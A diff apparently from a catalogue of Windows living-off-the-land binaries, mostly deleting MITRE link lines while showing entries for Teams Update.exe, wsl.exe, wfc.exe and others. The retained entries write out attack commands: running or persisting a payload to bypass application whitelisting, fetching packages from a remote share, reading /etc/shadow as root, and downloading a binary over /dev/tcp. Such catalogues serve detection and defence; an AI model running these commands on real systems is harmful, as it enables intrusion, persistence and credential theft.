- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||
@@ -66,7 +59,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
@@ -74,7 +66,6 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
@@ -82,7 +73,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||
@@ -90,7 +80,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||
@@ -98,7 +87,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1547
|
||||
MitreLink: https://attack.mitre.org/techniques/T1547/001/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
||||
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
||||
@@ -106,7 +94,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1070
|
||||
MitreLink: https://attack.mitre.org/techniques/T1070/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Microsoft\Teams\update.exe'
|
||||
|
||||
@@ -10,17 +10,16 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10 and up with VS/VScode installed
|
||||
Full_Path:
|
||||
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: VSIISExeLauncher.exe spawned an unknown process
|
||||
Resources:
|
||||
- Link: https://github.com/timwhitez
|
||||
Acknowledgement:
|
||||
- Person: timwhite
|
||||
Handle:
|
||||
Handle:
|
||||
---
|
||||
|
||||
@@ -10,15 +10,14 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
|
||||
@@ -28,4 +27,4 @@ Acknowledgement:
|
||||
Handle: '@tifkin'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\vsjitdebugger.exe
|
||||
|
||||
@@ -10,13 +10,12 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
@@ -25,4 +24,4 @@ Acknowledgement:
|
||||
Handle: '@mattifestation'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
|
||||
|
||||
@@ -10,7 +10,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
- Command: wsl.exe -u root -e cat /etc/shadow
|
||||
Description: Cats /etc/shadow file as root
|
||||
@@ -18,7 +17,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
- Command: wsl.exe --exec bash -c 'cat file'
|
||||
Description: Cats /etc/shadow file as root
|
||||
@@ -26,7 +24,6 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
|
||||
Description: Downloads file from 192.168.1.10
|
||||
@@ -34,7 +31,6 @@ Commands:
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
MitreLink: https://attack.mitre.org/techniques/T1202
|
||||
OperatingSystem: Windows 10, Windows 19 Server
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wsl.exe
|
||||
|
||||
Reference in New Issue
Block a user